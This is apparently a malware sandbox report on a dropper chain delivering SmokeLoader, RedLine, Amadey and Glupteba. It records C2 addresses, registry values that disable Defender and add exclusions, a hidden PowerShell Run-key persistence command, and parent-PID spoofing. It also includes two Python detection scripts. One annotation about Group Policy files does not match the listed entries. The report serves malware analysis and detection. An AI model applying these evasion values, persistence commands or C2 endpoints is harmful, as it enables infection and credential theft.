Resubmissions
Date              Analysis ID        Score
05-11-2023 12:17  231105-pf2daaef81  10
24-10-2023 23:16  231024-29g8qabd97  10
24-10-2023 23:01  231024-2zjzkacb7s  10

Analysis
max time kernel: 463s
max time network: 467s
platform: windows10-1703_x64
resource: win10-20231023-en
resource tags: arch:x64, arch:x86, image:win10-20231023-en, locale:en-us, os:windows10-1703-x64, system
submitted: 24-10-2023 23:16
Static task
static1
General
Target: file.exe
Size: 1.5MB
MD5: 1b438e034879220d999d39613ae678b8
SHA1: 827047c1557554f0afacfd0109bce4913e4c0d76
SHA256: 53f135c8b723864adcb0ae7aa5d1ec5b3358c3ed37022fd5dc14f7ce2d0429b0
SHA512: e785d3db5af52dbfd225bda0bdce809b1ac7dd77bd739f54831e4e1b45e02a901170cb5703bf8369d184723f244a6fd43e2d3d4d9d856e1051287926d2f9d538
SSDEEP: 24576:3yPozbf3AxyTF4sVBKhkAHR9WAWm0eW25jDRvXgIBV7LkV3J8nDLv4snaGgJML10:CPof3Cy5KksWd/QDRoS12cLDnaFMLX
Malware Config
Extracted: smokeloader
  Version: 2022
  C2: http://77.91.68.29/fks/
Extracted: redline
  Botnet: grome
  C2: 77.91.124.86:19084
Extracted: amadey
  Version: 3.89
  C2: http://77.91.124.1/theme/index.php
  install_dir: fefffe8cea
  install_file: explothe.exe
  strings_key: 36a96139c1118a354edf72b1080d4b2f
Extracted: redline
  Botnet: kinza
  C2: 77.91.124.86:19084
Extracted: smokeloader
  Botnet: up3 (no C2 shown for this extraction)
Signatures

DcRat 15 IoCs
DarkCrystal (DCRat) is a .NET RAT, active since June 2019, that can load additional plugins. Treat this label as weak here: the 15 IoCs behind it are 14 schtasks.exe launches and one wextract RunOnce write, none of which is DcRat-specific, and no DcRat configuration was extracted (the extracted configs above are SmokeLoader, RedLine and Amadey).
Processes (pid  process):
  4444  schtasks.exe
  304   schtasks.exe
  700   schtasks.exe
  168   schtasks.exe
  1000  schtasks.exe
  1012  schtasks.exe
  5784  schtasks.exe
  file.exe  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""
  4192  schtasks.exe
  1804  schtasks.exe
  5492  schtasks.exe
  3248  schtasks.exe
  3848  schtasks.exe
  2936  schtasks.exe
  1092  schtasks.exe
Glupteba payload 2 IoCs
Resources (memory dump  YARA rule):
  behavioral1/memory/6016-1406-0x0000000002E30000-0x000000000371B000-memory.dmp  family_glupteba
  behavioral1/memory/6016-1412-0x0000000000400000-0x0000000000D1B000-memory.dmp  family_glupteba
Disables Windows Defender real-time protection via policy registry values 10 IoCs
AppLaunch.exe is the legitimate .NET host that several droppers hollow via SetThreadContext (see below), so the AppLaunch.exe writes come from injected code rather than from AppLaunch.exe's own logic.
Processes:
  Key: \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
  Set value (int) DisableIOAVProtection = "1"  AppLaunch.exe
  Set value (int) DisableIOAVProtection = "1"  8EC2.exe
  Set value (int) DisableOnAccessProtection = "1"  8EC2.exe
  Set value (int) DisableRealtimeMonitoring = "1"  8EC2.exe
  Set value (int) DisableBehaviorMonitoring = "1"  AppLaunch.exe
  Set value (int) DisableOnAccessProtection = "1"  AppLaunch.exe
  Set value (int) DisableRealtimeMonitoring = "1"  AppLaunch.exe
  Set value (int) DisableScanOnRealtimeEnable = "1"  AppLaunch.exe
  Set value (int) DisableBehaviorMonitoring = "1"  8EC2.exe
  Set value (int) DisableScanOnRealtimeEnable = "1"  8EC2.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
Resources (memory dump  YARA rule):
  behavioral1/memory/3012-75-0x0000000000400000-0x000000000043E000-memory.dmp  family_redline
  behavioral1/memory/5456-775-0x0000000000B80000-0x0000000000BBE000-memory.dmp  family_redline
  behavioral1/memory/4896-1353-0x0000000000400000-0x000000000047E000-memory.dmp  family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
Both creators spawn children with Explorer.EXE (PID 3260) recorded as the parent instead of themselves (parent-PID spoofing), so those children show up in process trees as ordinary Explorer children and the link back to latestX.exe / updater.exe is lost unless the creating PID is logged.
Processes (creator pid  process  claimed parent  count):
  PID 5484 created 3260  latestX.exe  Explorer.EXE  x5
  PID 5604 created 3260  updater.exe  Explorer.EXE  x6
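As an added example (not code from this report or from the sandbox), the following Python reads rows in the shape printed above and flags creations whose creator PID differs from the parent recorded on the child. The column reading (creator PID, claimed parent PID, creator image, parent image) is inferred from this page; the allowlist of creators that legitimately re-parent (svchost.exe hosting AppInfo for UAC elevation) and the two extra sample rows are assumptions.

```python
"""Detect parent-PID spoofing from process-creation records.

Added example; not code from this report or from the sandbox. The row shape
mirrors the signature output above ("PID <creator> created <parent> <creator>
<creator image> <parent image>"); that column reading is inferred from the page.
Real telemetry (e.g. ETW Microsoft-Windows-Kernel-Process, which reports the
creating PID separately from the parent stamped on the child) should be mapped
into CreationEvent before calling flag_spoofed_parents().
"""
import re
from collections import Counter
from dataclasses import dataclass

ROW = re.compile(
    r"^PID (?P<creator>\d+) created (?P<parent>\d+) (?P<pid>\d+) "
    r"(?P<creator_image>\S+) (?P<parent_image>\S+)$"
)

# Creators that legitimately stamp a different parent on the child: the AppInfo
# service (hosted in svchost.exe) launches UAC-elevated processes with the
# requesting process as parent. Assumption: tune this set to your environment.
LEGITIMATE_REPARENTERS = {"svchost.exe"}


@dataclass(frozen=True)
class CreationEvent:
    creator_pid: int      # process that called NtCreateUserProcess
    creator_image: str
    parent_pid: int       # parent recorded on the new process
    parent_image: str


def parse_row(line):
    """Parse one signature row; returns None for lines of another shape."""
    m = ROW.match(line.strip())
    if m is None:
        return None
    return CreationEvent(int(m["creator"]), m["creator_image"],
                         int(m["parent"]), m["parent_image"])


def flag_spoofed_parents(events):
    """Creations where the creator is not the recorded parent and is not a
    known legitimate re-parenter."""
    return [e for e in events
            if e.creator_pid != e.parent_pid
            and e.creator_image.lower() not in LEGITIMATE_REPARENTERS]


def summarize(events):
    """Count flagged creations per (creator image, claimed parent image)."""
    return dict(Counter((e.creator_image, e.parent_image)
                        for e in flag_spoofed_parents(events)))


# Constructed sample: the first three rows are copied from this report, the last
# two are made up to show a normal creation and a UAC-style re-parenting.
SAMPLE_ROWS = [
    "PID 5484 created 3260 5484 latestX.exe Explorer.EXE",
    "PID 5484 created 3260 5484 latestX.exe Explorer.EXE",
    "PID 5604 created 3260 5604 updater.exe Explorer.EXE",
    "PID 3260 created 3260 3260 Explorer.EXE Explorer.EXE",
    "PID 900 created 4100 900 svchost.exe cmd.exe",
]

if __name__ == "__main__":
    events = [e for e in map(parse_row, SAMPLE_ROWS) if e is not None]
    for (creator, parent), n in summarize(events).items():
        print(f"{creator} spoofed parent {parent} in {n} creation(s)")
```

The check only works on a data source that records the creating process independently of the parent stamped on the child; Sysmon event 1 alone shows the spoofed parent and would report these children as Explorer's.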
Adds Windows Defender exclusions 7 IoCs
Processes:
  Key: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions
  Set value (int) Paths\C:\Windows\windefender.exe = "0"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Set value (int) Paths\C:\Windows\System32\drivers = "0"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Set value (int) Processes\csrss.exe = "0"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Set value (int) Processes\windefender.exe = "0"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Set value (int) Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Set value (int) Paths\C:\Windows\rss = "0"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Set value (int) Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"  31839b57a4f11171d6abc8bbc4451ee4.exe
Blocklisted process makes network request 1 IoCs
Processes (flow  pid  process):
  248  3304  rundll32.exe
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Both writers rewrite the hosts file; latestX.exe is also the process that drops C:\Program Files\Google\Chrome\updater.exe (see the Program Files block below), so the same chain touches the hosts file twice. Diff the file against a known-good copy on any host showing this.
Processes:
  File created  C:\Windows\System32\drivers\etc\hosts  updater.exe
  File created  C:\Windows\System32\drivers\etc\hosts  latestX.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  Install.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  rundll32.exe
Checks computer location settings 2 TTPs 3 IoCs
Looks up the country code configured in the registry, likely a geofence.
Processes:
  Key value queried  \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Control Panel\International\Geo\Nation  vaxPtPs.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Control Panel\International\Geo\Nation  cmd.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Control Panel\International\Geo\Nation  cmd.exe
Executes dropped EXE 59 IoCs
Processes (pid  process):
  520 Yj1WX27.exe, 3444 vh4hc74.exe, 1344 nF6Lt05.exe, 2228 TN7Pe86.exe, 2960 Vy4Zf18.exe,
  2996 1Iz10bE7.exe, 2544 2Hu0424.exe, 4260 3Pp48oh.exe, 1012 4LF780EA.exe, 5032 5Ny9PH9.exe,
  4224 explothe.exe, 2320 6Kg3IZ2.exe, 4376 7HZ9qx58.exe, 5112 yb9ls3GZ.exe, 4656 85F4.exe,
  520 PA3Ij9az.exe, 3688 8AB8.exe, 5112 yb9ls3GZ.exe, 4396 ye0fC7ZR.exe, 2336 SJ3EA0VH.exe,
  304 1Xf60zx0.exe, 3536 8D1B.exe, 5152 8EC2.exe, 5204 91EF.exe, 5456 2fr169sf.exe,
  1680 4449.exe, 4368 4822.exe, 5168 toolspub2.exe, 6016 31839b57a4f11171d6abc8bbc4451ee4.exe, 4552 setup.exe,
  5944 kos2.exe, 5892 Install.exe, 5484 latestX.exe, 4896 515A.exe, 220 set16.exe,
  4392 Install.exe, 5808 K.exe, 4576 is-OVUC4.tmp, 5712 toolspub2.exe, 4452 MyBurn.exe,
  5776 MyBurn.exe, 3560 explothe.exe, 5792 8D0D.exe, 5628 AB44.exe, 3488 31839b57a4f11171d6abc8bbc4451ee4.exe,
  5604 updater.exe, 5564 csrss.exe, 408 tJYzbog.exe, 4516 explothe.exe, 5680 injector.exe,
  5528 windefender.exe, 2824 windefender.exe, 5668 vaxPtPs.exe, 6056 explothe.exe, 6064 f801950a962ddba14caaa44bf084b55c.exe,
  5904 explothe.exe, 2664 explothe.exe, 6032 explothe.exe, 2812 explothe.exe
Loads dropped DLL 7 IoCs
Processes (pid  process):
  5744  rundll32.exe
  4576  is-OVUC4.tmp  (x3)
  4896  515A.exe  (x2)
  3304  rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to servers other than the configured DNS servers was detected on the DNS port.
Processes:
  Destination IP  51.159.66.125
Modifies Windows Defender exclusions and tamper-protection setting 8 IoCs
Processes:
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"  8EC2.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"  31839b57a4f11171d6abc8bbc4451ee4.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"  31839b57a4f11171d6abc8bbc4451ee4.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 14 IoCs
The wextract_cleanupN RunOnce entries are written by the Windows self-extractor (wextract/IExpress) to delete its IXP00N.TMP working directory at next logon; they show a nested chain of self-extracting packages, not persistence of a payload. The persistence entries proper are the two HKCU Run values: csrss (C:\Windows\rss\csrss.exe) and socks5 (a hidden PowerShell launch of 4822.exe).
Processes:
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""  Vy4Zf18.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""  85F4.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""  TN7Pe86.exe
  Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""  31839b57a4f11171d6abc8bbc4451ee4.exe
  Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""  csrss.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""  file.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""  Yj1WX27.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""  ye0fC7ZR.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\""  SJ3EA0VH.exe
  Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\4822.exe'\""  4822.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""  PA3Ij9az.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""  yb9ls3GZ.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""  vh4hc74.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""  nF6Lt05.exe
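The Defender policy writes, the Defender exclusion writes and the Run/RunOnce entries in the blocks above all share one row shape. The following Python, an added example and not code from this report or the sandbox, parses rows of that shape and sorts them into findings, keeping the self-extractor cleanup RunOnce entries apart from real persistence. The sample rows are constructed from entries on this page; the category names and the regular expressions are this example's own.

```python
"""Sort sandbox registry-write rows into defense-evasion and persistence findings.

Added example; not code from this report or the sandbox. It parses rows in the
'Set value (type) \\REGISTRY\\... = "data" process.exe' shape used by the
blocks above. The category names are this example's own; the sample rows are
constructed from entries visible on this page.
"""
import re
from dataclasses import dataclass

ROW = re.compile(
    r'^Set value \((?P<type>int|str)\) (?P<path>\\REGISTRY\\.+?) = "(?P<data>.*)" (?P<proc>\S+)$'
)
EXCLUSION = re.compile(r"\\windows defender\\exclusions\\(paths|processes|extensions)\\(.+)$")
# wextract/IExpress self-extractors register this RunOnce command to delete
# their IXP00n.TMP directory at next logon; it is an installer artefact, not
# payload persistence, so it is reported under its own category.
IEXPRESS_CLEANUP = re.compile(r"^rundll32\.exe .*advpack\.dll,DelNodeRunDLL32 ", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    category: str
    process: str
    detail: str


def parse_row(line):
    """Return the row's fields as a dict, or None if the line has another shape."""
    m = ROW.match(line.strip())
    return m.groupdict() if m else None


def classify(row):
    """Map one parsed row to a Finding, or None if it is not of interest."""
    path, data, proc = row["path"].lower(), row["data"], row["proc"]
    key, _, name = path.rpartition("\\")
    excl = EXCLUSION.search(path)
    if excl:  # checked first: an excluded path contains backslashes itself
        return Finding("defender_exclusion", proc, f"{excl.group(1)}:{excl.group(2)}")
    if "\\windows defender\\real-time protection" in key and name.startswith("disable") and data == "1":
        return Finding("defender_realtime_disabled", proc, name)
    if key.endswith("\\windows defender\\features") and name == "tamperprotection" and data == "0":
        return Finding("defender_tamper_protection_off", proc, name)
    if key.endswith("\\currentversion\\run") or key.endswith("\\currentversion\\runonce"):
        if name.startswith("wextract_cleanup") and IEXPRESS_CLEANUP.match(data):
            return Finding("iexpress_cleanup_runonce", proc, name)
        return Finding("run_key_persistence", proc, f"{name} -> {data}")
    return None


def analyze(lines):
    """Parse and classify every row; unparseable or uninteresting rows are skipped."""
    findings = []
    for line in lines:
        row = parse_row(line)
        if row is None:
            continue
        finding = classify(row)
        if finding is not None:
            findings.append(finding)
    return findings


def by_category(findings):
    grouped = {}
    for f in findings:
        grouped.setdefault(f.category, []).append(f)
    return grouped


# Constructed sample rows, one per behaviour seen in the blocks above.
SAMPLE_ROWS = [
    r'''Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 8EC2.exe''',
    r'''Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 8EC2.exe''',
    r'''Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe''',
    r'''Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe''',
    r'''Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe''',
    r'''Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\4822.exe'\"" 4822.exe''',
    r'''Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" file.exe''',
]

if __name__ == "__main__":
    for category, items in by_category(analyze(SAMPLE_ROWS)).items():
        print(category)
        for f in items:
            print(f"  {f.process}: {f.detail}")
```

Exclusions are matched before the key/value split because the excluded path is itself the value name and contains backslashes; everything is lower-cased first since registry paths are case-insensitive.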
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes:
  File created  C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json  vaxPtPs.exe
  File created  C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json  vaxPtPs.exe
Drops desktop.ini file(s) 1 IoCs
Processes:
  File opened for modification  C:\$RECYCLE.BIN\S-1-5-18\desktop.ini  vaxPtPs.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Manipulates WinMonFS driver 1 IoCs
Rootkits write to WinMonFS to hide directories/files from detection.
Processes:
  File opened for modification  \??\WinMonFS  csrss.exe
Drops file in System32 directory 40 IoCs
Most of these are profile noise from PowerShell and WinINet/CryptoAPI running as SYSTEM. The ones worth following up are the Group Policy files: Install.exe creates C:\Windows\system32\GroupPolicy\gpt.ini, cmd.exe creates Machine\Registry.pol and vaxPtPs.exe then modifies it, which is how a local machine policy is planted; read the resulting Registry.pol to see which policies were set.
Processes:
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive  powershell.exe
  File created  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
  File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive  reg.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies  vaxPtPs.exe
  File created  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log  powershell.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB  vaxPtPs.exe
  File created  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log  powershell.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive  powershell.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive  powershell.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive  powershell.exe
  File created  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat  rundll32.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA  vaxPtPs.exe
  File opened for modification  C:\Windows\system32\GroupPolicy\Machine\Registry.pol  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280  vaxPtPs.exe
  File created  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive  powershell.exe
  File opened for modification  C:\Windows\system32\GroupPolicy\gpt.ini  cmd.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA  vaxPtPs.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280  vaxPtPs.exe
  File created  C:\Windows\system32\GroupPolicy\gpt.ini  Install.exe
